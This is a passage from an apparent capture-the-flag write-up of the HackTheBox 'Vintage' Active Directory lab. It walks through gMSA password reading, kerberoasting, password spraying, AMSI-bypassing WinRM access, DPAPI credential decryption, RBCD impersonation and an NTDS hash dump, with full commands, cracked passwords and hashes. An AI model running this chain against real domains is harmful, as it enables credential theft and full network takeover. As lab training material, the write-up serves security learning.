LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\FS01$:fs01 
LDAP        dc01.vintage.htb 389    DC01             [*] Getting GMSA Passwords
LDAP        dc01.vintage.htb 389    DC01             Account: gMSA01$              NTLM: 0851299c01b944d01099fc977eaa6c67     PrincipalsAllowedToReadPassword: Domain Computers

And now we have new pair of:

user: gMSA01$
ntlm: 0851299c01b944d01099fc977eaa6c67

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u 'gMSA01$' -H 0851299c01b944d01099fc977eaa6c67 -k
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\gMSA01$:0851299c01b944d01099fc977eaa6c67

Next we will grab the ticket of gMSA01$:

┌──(kali㉿kali)-[~]
└─$ sudo impacket-getTGT vintage.htb/'gMSA01$' -hashes :0851299c01b944d01099fc977eaa6c67                                                              
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in gMSA01$.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME='gMSA01$.ccache'

And add our gMSA01$ account into “ServiceManagers” group

┌──(kali㉿kali)-[~]
└─$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k add groupMember ServiceManagers 'gMSA01$' 
[+] gMSA01$ added to ServiceManagers

And now supposed we’re good to move-on to own 3 SVC account.

Removing UAC for Kerberos Attack

Been trying to do Kerberoasting from NetExec but thoose 3 SVC are protected by UAC, I’ll remove it from the SVC_SQL account.

But to do so don’t forget to re-new the gMSA01$ ticket since we’re now part of “ServiceManagers“:

┌──(kali㉿kali)-[~]
└─$ sudo impacket-getTGT vintage.htb/'gMSA01$' -hashes :0851299c01b944d01099fc977eaa6c67                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in gMSA01$.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME='gMSA01$.ccache'

┌──(kali㉿kali)-[~]
└─$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k remove uac SVC_SQL -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from SVC_SQL's userAccountControl

After some testing, NetExec can’t get roastable hash due to those 3 SVC doesn’t have SPNs, however we still can use:

targetedKerberos.py tool of GitHub, and if you still want NetExec we can add the SPNs our-self via bloodyAD:

┌──(kali㉿kali)-[~]
└─$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k -f rc4 set object SVC_SQL servicePrincipalName -v 'http/sql'
[+] SVC_SQL's servicePrincipalName has been updated
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k -f rc4 set object SVC_LDAP servicePrincipalName -v 'http/ldap'
[+] SVC_LDAP's servicePrincipalName has been updated
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k -f rc4 set object SVC_ARK servicePrincipalName -v 'http/ark'
[+] SVC_ARK's servicePrincipalName has been updated

And now we can use NetExec for roasting:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u 'gMSA01$' --use-kcache -k --kerberoasting out.hash                      
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:VINTAGE.HTB) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] VINTAGE.HTB\gMSA01$ from ccache 
LDAP        dc01.vintage.htb 389    DC01             [*] Skipping disabled account: krbtgt
LDAP        dc01.vintage.htb 389    DC01             [*] Total of records returned 3
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ark, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 09:45:27.913095, lastLogon: 
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb\svc_ark*$fbe5f5626fafa60bada3ad903106c79b$d0db933579be54f6344e172e1d989ef96bde764dfd82552d8a1ef4328ddb7cae2e70dcb3dfcea1c045e7eaf4d8499683467afcd33b700aedb2e93ce6a751c534153498781ed75eeab0d4e10bf4a56ad3fbe51e77b265959c9ce3e26a77cf5a4f2e51148f4b584540bfd4a66e74aadb90894683a9b4ab699fa69467da9b9c4510ecc8e6fa5b549b31afd05304f89bbd8fa2b71573e76367520173e158e5c6892a697725ee98b194dc9681895c59f3e1ce906ab419c5002916b6bf5c94d00705ef6422ca622d08b98823aead887f008482404fd168629cdab5ef5bac858c1b72ee332aef7575b016c87cb5ed1bfd07246c7b2a8e8925dc27b46261f1d85aa52111af521da77f84f99c93679ac8f02aa0295d1bc5dca206c9247dd6fcf65ce9a2ea526c452dfbfea9254b44597680ae91df1724a58ea053497ddf9a4910aa7bfec0825a90146336d0dd29a878373dc6681e8b9db90209736f3c3dc538414f4aaad1e096e2e002f36becd5208f383be069dbe294854c841d6f1831bfea201098db03aed75326696e95a90f3002b113371da9bb41ec480878ff85e5eee1e2535678db2cda03bcbbe28478f89faa0678217acdf9c2fb83bbff2ce54603c26b8e5b812502e431170ab45ad3a160507dc04f6a8fad0b3f3f87fa17c96cdd48fd00dcb5f70297a43792a5ce883de331baf8b7093df32256cacc4785d09418fb67c4d9dbcca7cd7c5312634c8c84c7359c00aecb475f7fe3c8bc06c9743d1594ade65433378bdfd479c54341712280cef649b427b0151567f29c5d7586d7fef123b9f0bc413a2dc2465fbcf684322e20ee15686e4bdc7e89c4d79b5373c1b012b6ace35d83d6f725b2a87a188538a00edf0b586e46237e36e59dc9f5d2358feb8ebe7686ea82decfc459999222b9d4815d913a66964fb759d3f7ada430aab27c93c0f39632daabaac9e70d1765bda87d9e4686ee6ac8f7de1eb35192ff513c85f2d4f242a6a15bc2f91b455534b53065e4970c07a3d06d50060d32fa2ebe1062586c1f3622a66767f3e531ed2078f4e901f75b214d6eaa2836712bec622edfbc7f5c202020dfe86f4b855af6cb361f7e5bb60c5d6f6cbf53002ca03612e9f95f92327c20842ef9d900c93bd5511a33fbcfccf738603aa49b63a9f2201478634dc3200541e87d19c469254ac6af2afcb6b2fe2c0786e7dd180810cb44d9167b1cc8e47792f4b6a52f68b4e15fcb6b5216be541653e33e7aaf91e5647c76bc5f06cb0b387b55a37a6b01aba6885f2131bc555c9a03ccda746401730e888d3880d04e4ae476621c2da5dbebef8dbe35a4e16bbafb10637cde8ab3d3c3be2f349f8cecc237ca9c993c956671ad4c9f7f60dd06e6682372d8ca9addc1fd0097a6d98cb03816fc740649e2e870edc81d152c7d0dff1dbe2fa52c6cd3b0d6cc1de763d74a81b5d77fb037b9                                                                                                                                                  
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ldap, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 09:45:27.881830, lastLogon: 
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb\svc_ldap*$0bc05fe75ce2c7b1fe6bed5e9d5b0ce9$a1b47ef6464943cd23bca365e1388c67cca726ae1e259d9b2189017add3b3e0de550df03f3b4e539c8071f181f3d18849b5c57b966046d8a2c74414105fd11530365bf1ad8f3f3d67e409ba690bd8e57eb13ce4ffea5945aa1c96ecf4d43154781baaa3f723e9c74f486720fa30bbd107944bb124ef46a8130c30e92d86f42a9dbe3a84f0aa06eaa0288babfccf8a25b7e5ae38bacfcc6eecf45a54780a40efc596e589a46d37793271143a944feb8e642ac7fbdf70cb89d912c88fbd6a73333c8689d0be5499c0a0664b7cf80fa98a07fa0fc6a6b07632b98a2e1156c1c7f0ed8088d84eeffb07d1f6cc41c68c5fd747b5d36ccd71df51da44be52a78d48ccd0dbfab33335e30541feeb54c3e9c8a68c7710dbea91c647d9de45ad490a840cd1d48e7de6fdc34d8b268de8766e2010542197b6d90f2d6c7cb0f1090c113efe5a0ccb175b7814c4a7323e9ec681d3a312a8a28dd49143fa8f18857bc4e5ce4c9ceccc4401324bf1e4e4def427761ac5ac2908269173edcef84c4a3d6fd78c062f11908bac77715d393c5c3e6807ad0ca79c6c37036cf68dfc4720ef119026bfbe697bccc705abd927bdd238c4082587ad172c91f346498b207cab88e04cb31d42e2ff2f1556495fe6599cc0184372a9f69301f5548f1d639b1da597c6dd1e79df649b187b245c5a4deb6e6ca327ee1bb5ed0aac7a0244cf75c7c10552e2a4b39cb32f8907a002d3d79713c000d2922efd8efe82d04e08f2e4b9a72f2560a1b865ea29223847c1375b9502601920d6c2b644b78d3451224ed185f4bddec80e38fe470892ca7df98157cc6fb672cbeb395c27a8a0057e7802dd80c3746837de50b3dbe502756b9657ab93658240e5ea9b37b2a363ee408f3cf85bc2e79d773afd662fd83f54255ca9b35aa19409dc9c401168b16d577cae771acc85f7c312d96b906c5fc36bede922a48c670689a8207616b70deecac4119b48749d2018c64976c02907b69bf20ef366a4ac03c283876b3ec78b2b8f5a11a96880a2519cd29e61c0457ab65bae96998737338a8bef72644686741c8981a29ddc9bdb1bd2769a32bcbabfa861d14ed7eff71119c205b8b596f28e749a3b3787b020e3866cf5f817ace0c93aa6c8eb5d4a1dbe21cb51d81892443469f955fc9c06f4740ae0745872beb44cc23b0771214692d3987373afc361f113269dc4ceacb0f8c3122c0afe4baeac849f7fef379255dfa972ba21ee2f038e40b5fad4e029ab4c294f7b4a2ccfa7c12541f371539c9e0adc55cfb8898aa383e48661b6ab9b1e56c956147e0f306a7b67c28b8faa563e429a565a9d07ff7afff69a1c10b236de4ac7ad60aefa03e5a076f1398fc1e62ea69399ef8503efe8b497a327641c79a3a114b146ce33b32ad8b09fd7711eaa0482916dfb49a4ced88f5567b93f32944c743600c16dca75d725ebf                                                                                                                                                
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_sql, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2026-04-07 00:12:04.505417, lastLogon: 
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\svc_sql*$01671601babce09671e09c4ca23968f6$17295c765b73503eb4b33e6d0beb480f45abd78efd419a1fe9eda5741b44181a4fec04a2ade3f77af6b0e0b6da3495a1903d244ba2569f8848360088e2e6302d1eb13d68abc18ad35ccb5f27bf26cd6a185d9e21e4aaaa1cc6177ee367556837132b2d91a7eb3b4d4ff33b473541fceaa0e9f75039cd318b3a6882db223c1aa15f1015c6663831dab2635c69702b461753da73226cdbed57c1d596fe553ba1b3b37589e27e38412f7b3b58f0caa7768c2e817ca63b2a423457e02de76296605ff5cfa8efb38580c59fab92578bd5563b4fd31c5b98ecdd436d3d0743cfb9055c80f2a482f70face8351bb1b12d8f25267b0e65de06e168b886ee0aabb3ccddf03f500194e14ac24a0089b5c40671787467b7960fed2d4b2afc8fc097cfd5243c2a5d4d77e13fac5be99335649b5856a51f2c52a4c15c1770f2a4fe27f3e579a52dcf895dbe9191048f573dac2ed11bf8ef1512ea75ba96116b7fc6f52a4d22f89d544ecb761a964e0ad6a20964ed485e5360df701695a09f7a1ee18aa8df5bc530e50dd2e5f48483c25b466172b47158d8d0800cb2a56a6185d88d13d5ade19366ff05fd67283c764c4ea15f33090e187464f52fc1b015e6e1b37a359434821c13fec48d776b05a4161f177102e19ea78805f143596a1368e848f78f318033789d22f77d77ef4f69951081a14ea27499f171b7640e98a817b626ddcd3285f66c9ec225f35e8e59018fc2002c3bbbcc141e99d41df185fe1dacbc2c2db5e48f73a28578a98e29470a45fa1de66824d0b23031ffa3ff6fd7e56c1330eb9db2947a3995c6276a50a0e343e64cc33c814bd74126f8bb6a267de577fbd3e22ddfff3faa9bf1fdcccdbc4904a628b17710ae19c7cef6f66bcf58172fa3158534e048c2358e42c2e8207c169efb603a0e6dc9f0bcf899b72a0a61a9298544351afe5b276f7cde6a89a58e93e2db513f58600ba982801aa01d2390246a999bdaa0c94d46a4a796b9cd3d8a4055bf83e5693b1c9f7f908fa7c7f440313478dad0f0308092a5c02a332f9e61f8e0fa636a71dab94ed55014bd3faf7b2deb07f6ea49273142f1a0adb0e2de95c6d3b3dad7e940848019b16cdeab4f51383eb3f30bc35f31be46e0aff38998e1f0af8cacd023f6cb0c08240fc700b16922d2c2b25cfe9f4c314ab24c7027853baf6a8f7d40c8f60251c1ef9c75aca4bec1cc59083f70d3e80c26df898763d758f4f7472a3447de5ec7443193ad8cfa7f342ef8868c4b42bff4b29e4c08f279a3b5c536f503c9b3dcffa908bd03ef72cc181ba632b5e81139ec58af02221c987e0410ecb6619338421cc7e411e499e5b9bc646f237bccf0c2b868e6c106a6a175c2a9e08a969dcc6c3453e77fc686a5d96aa8d98bba741f09897a52ec31314accc7c8c56b377f11823ebe3718f8376425fc4f2d82f26445592ca94f37

clean, we’ve got all of those 3 SVC account:

┌──(kali㉿kali)-[~]
└─$ wc -l out.hash 
3 out.hash

Let’s recover the hash:

┌──(kali㉿kali)-[~]
└─$ john out.hash --wordlist=/usr/share/wordlists/rockyou.txt                                 
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Zer0the0ne       (?)     
1g 0:00:00:12 DONE (2026-04-07 00:27) 0.08333g/s 1195Kp/s 2477Kc/s 2477KC/s !!12Honey..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

And all of those 3 hash we only got one recovered!!

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u users.txt -p Zer0the0ne -k --continue-on-success                                              
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\Administrator:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\Guest:Zer0the0ne KDC_ERR_CLIENT_REVOKED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\krbtgt:Zer0the0ne KDC_ERR_CLIENT_REVOKED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\M.Rossi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\R.Verdi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\L.Bianchi:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\G.Viola:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri:Zer0the0ne 
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\P.Rosa:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\svc_sql:Zer0the0ne 
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\svc_ldap:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\svc_ark:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\C.Neri_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED
LDAP        dc01.vintage.htb 389    DC01             [-] vintage.htb\L.Bianchi_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED

Man, we got lucky since that password is re-usable and also owned by others, we now have 2 new pairs:

user: svc_sql 
passwd: Zer0the0ne

user: C.Neri
passwd: Zer0the0ne

Local User Enumeration

Supposed our new user “C.Neri“ have higher access since my last check on SVC have nothing:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u C.Neri -p Zer0the0ne -k                        
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri:Zer0the0ne

“C.Neri” user indicated have 2 account, seems identical.

MATCH (u:User) WHERE u.name STARTS WITH 'C.NERI' RETURN u

But ours currently just regular and not ADM (Admin?).

Regular user “C.Neri“ also have 3 OOB but it’s the same as people inside the “ServiceManagers“ group, which now we didn’t needed to:

Turns-out we can Shell via WinRM, now I’ll use another Kerberos and using winrmrelayx as the shell provider:

With -k:

┌──(kali㉿kali)-[~]
└─$ sudo python3 evil_winrmrelayx.py C.neri@DC01.vintage.htb -k -no-pass -dc-ip 10.129.231.205 -target-ip 10.129.231.205
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.231.205:5985/wsman
[*] using domain and username from ccache: VINTAGE.HTB\C.Neri
[*] '-spn' not specified, using HTTP/DC01.vintage.htb@VINTAGE.HTB

Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
. . .[SNIP]. . .
  !stoplog                         # stop logging output to winrmexec_[timestamp]_stdout.log

PS C:\Users\C.Neri\Documents> whoami
vintage\c.neri
PS C:\Users\C.Neri\Documents> hostname
dc01

Dumping DPAPI

So now best I’d do is to doing internal enumeration. . .

After some enumeration, I discover a hidden directory in C.Neri user directory, basically it’s DPAPI potential with AppData continue to the Microsoft config.

Basically we’re required to dumped it, now the reason I use winrmrelayx as shell provider is also due to:

Automated AMSI bypass
Non encoded download required

PS: I’ve tried this step using Evil-winrm and I feel winrmrelayx save me lot’s of times.

For example:

PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> dir -h


    Directory: C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6                                      


PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> !download C4BB96844A5C9DD45D5B6A9859252BA6
downloading C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6
done!
PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials>

Basically download everything from:

C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6
C:\Users\C.neri\AppData\roaming\microsoft\protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
C:\Users\C.neri\AppData\roaming\microsoft\protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

And collect it!

┌──(venv)─(kali㉿kali)-[~]
└─$ ll dpapi                                          
total 12
-rw-r--r-- 1 root root 740 Apr  7 00:50 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
-rw-r--r-- 1 root root 740 Apr  7 00:51 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
-rw-r--r-- 1 root root 430 Apr  7 01:40 C4BB96844A5C9DD45D5B6A9859252BA6

Now we just needed to dump.

┌──(root㉿kali)-[/]
└─# dpapi.py masterkey -file dpapi/99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

┌──(root㉿kali)-[/]
└─# dpapi.py credential -file dpapi/C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : vintage\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312

And now we have a new pair:

user: c.neri_adm
passwd: Uncr4ck4bl3P4ssW0rd0312

I would also recommend try method of SharpDpapi.exe binary, why? because of the AMSI protection defender, winrmrelayx would solve the issue!!

Let’s continue.

Active Directory BloodHound (Part 02)

Now we own user C.Neri_ADM:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u C.Neri_adm -p Uncr4ck4bl3P4ssW0rd0312 -k                                                                                 
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri_adm:Uncr4ck4bl3P4ssW0rd0312 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo impacket-getTGT vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -k                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in c.neri_adm.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=c.neri_adm.ccache

Let’s see another BloodHound graph:

So this guy have one OOB to “DelegatedAdmins” group.

Which if we manage to be part of that group we will:

Oops, dosn’t have anything!!!

But we have connections with User L.Bianchi_ADM:

And L.Bianchi_ADM user have. . .93!! OOB:

Basically a GOD!

Which basically an Admin rights power:

DCSycn attack
Etc

So “C.Neri_ADM” user have paths to “L.Bianchi_ADM” user:

But however we have Shorter paths to DC, seems like we can do delegations family since we have “AllowedToAct“ upon DC01 computer to the main DC.

So here we can perform RBCD, and maybe for the SPN and impersonation gaining user “L.Bianchi_ADM” was already as good and gaining Administrator.

RBCD Attack

To Pull this attack we need “C.Neri_ADM” user to have SPNs, but since we don’t have it but we have “GenericWrite” we can just:

Add user who have it (FS01$)
Then we request the ticket behalf of somebody else

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap dc01.vintage.htb -u C.Neri_adm -p Uncr4ck4bl3P4ssW0rd0312 -k --find-delegation
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri_adm:Uncr4ck4bl3P4ssW0rd0312 
LDAP        dc01.vintage.htb 389    DC01             AccountName     AccountType DelegationType             DelegationRightsTo
LDAP        dc01.vintage.htb 389    DC01             --------------- ----------- -------------------------- ------------------
LDAP        dc01.vintage.htb 389    DC01             DelegatedAdmins Group       Resource-Based Constrained DC01$

Then we add FS01$ machine to “DelegatedAdmins” Group

┌──(kali㉿kali)-[~]
└─$ sudo impacket-getTGT vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -k                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in c.neri_adm.ccache
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=c.neri_adm.ccache 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:c.neri_adm.ccache
Default principal: c.neri_adm@VINTAGE.HTB

Valid starting       Expires              Service principal
04/07/2026 01:46:58  04/07/2026 11:46:58  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 04/08/2026 01:44:31

┌──(kali㉿kali)-[~]
└─$ sudo bloodyAD -d vintage.htb -k --host DC01.vintage.htb add groupMember DelegatedAdmins 'FS01$'
[+] FS01$ added to DelegatedAdmins

PS: here’s the situation (You need) between choosing wants to:

Own the DC ticket
Or Own User ticket

Up to you, since I choose to have “L.Bianchi_ADM” ticket, I un-set my Kerberos ticket and request the “L.Bianchi_ADM” user one:

┌──(kali㉿kali)-[~]
└─$ unset KRB5CCNAME                                                                                                             
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo impacket-getST -spn 'cifs/DC01.vintage.htb' -impersonate L.Bianchi_adm -dc-ip 10.129.231.205 vintage.htb/'FS01$':fs01 -k
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating L.Bianchi_adm
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.Bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache

And now supposed we have that “L.Bianchi_ADM” access ticket:

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=L.Bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:L.Bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache
Default principal: L.Bianchi_adm@vintage.htb

Valid starting       Expires              Service principal
04/07/2026 01:49:08  04/07/2026 11:49:06  cifs/DC01.vintage.htb@VINTAGE.HTB
        renew until 04/08/2026 01:46:39

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb dc01.vintage.htb -u L.Bianchi_adm -k --use-kcache
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\L.Bianchi_adm from ccache (Pwn3d!)

Pwned!!

DCSycn Attack

So user “L.BIANCHI_ADM@VINTAGE.HTB“ is on Domain Admin:

Now we DCSycn:

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb dc01.vintage.htb -u L.Bianchi_adm -k --use-kcache --ntds
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\L.Bianchi_adm from ccache (Pwn3d!)
SMB         dc01.vintage.htb 445    dc01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc01.vintage.htb 445    dc01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
SMB         dc01.vintage.htb 445    dc01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc01.vintage.htb 445    dc01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
SMB         dc01.vintage.htb 445    dc01             M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
SMB         dc01.vintage.htb 445    dc01             R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
SMB         dc01.vintage.htb 445    dc01             L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
SMB         dc01.vintage.htb 445    dc01             G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
SMB         dc01.vintage.htb 445    dc01             C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
SMB         dc01.vintage.htb 445    dc01             P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
SMB         dc01.vintage.htb 445    dc01             svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
SMB         dc01.vintage.htb 445    dc01             svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
SMB         dc01.vintage.htb 445    dc01             svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
SMB         dc01.vintage.htb 445    dc01             C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
SMB         dc01.vintage.htb 445    dc01             L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
SMB         dc01.vintage.htb 445    dc01             DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
SMB         dc01.vintage.htb 445    dc01             gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:0851299c01b944d01099fc977eaa6c67:::
